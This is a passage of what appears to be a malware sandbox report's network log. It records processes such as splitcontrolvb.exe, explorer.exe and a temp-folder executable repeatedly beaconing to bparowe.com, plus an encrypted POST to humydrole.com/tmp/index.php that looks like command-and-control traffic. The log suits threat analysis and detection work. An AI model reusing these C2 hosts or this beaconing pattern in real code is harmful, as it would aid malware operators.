                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:05.305912971 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:05 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                228192.168.2.459463185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:05.759308100 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:06.032881975 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:05 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                229192.168.2.459464185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:06.502955914 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:06.783544064 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:06 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                230192.168.2.459465185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:07.251127005 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:07.530174017 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:07 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                231192.168.2.459466185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:07.974049091 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:08.251609087 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:08 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                232192.168.2.459467180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:08.050324917 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://vhvmaryfjrlut.org/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 247
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:08.050422907 CET247OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 3a ad ac
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA .[k,vuJ:O`;D|67U>rdU^4Q%?DFY*jMm_&lU`SHp6+IW~Vz:d <q
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:09.048060894 CET252INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:08 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                                                                                                                                                                                                Data Ascii: r


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                233192.168.2.459468185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:08.675419092 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:08.949826956 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:08 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                234192.168.2.45876764.190.63.111805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:09.031007051 CET233INHTTP/1.1 408 Request Time-out
                                                                                                                                                                                                                                                                                                                                Content-length: 110
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                235192.168.2.45876864.190.63.111805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:09.031548977 CET233INHTTP/1.1 408 Request Time-out
                                                                                                                                                                                                                                                                                                                                Content-length: 110
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                236192.168.2.459469185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:09.377043009 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:09.654890060 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:09 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                237192.168.2.459470185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:10.110017061 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:10.392663956 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:10 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                238192.168.2.459471185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:10.811983109 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:11.087872982 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:10 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                239192.168.2.459472185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:13.192828894 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:13.473193884 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:13 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                240192.168.2.459473185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:14.074203968 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:14.352730036 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:14 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                241192.168.2.459474185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:14.797420979 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:15.073306084 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:14 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                242192.168.2.459475185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:15.500864029 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:15.780066967 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:15 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                243192.168.2.459476185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:16.218537092 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:16.496866941 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:16 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                244192.168.2.459477185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:17.045209885 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:17.324887037 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:17 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                245192.168.2.459478185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
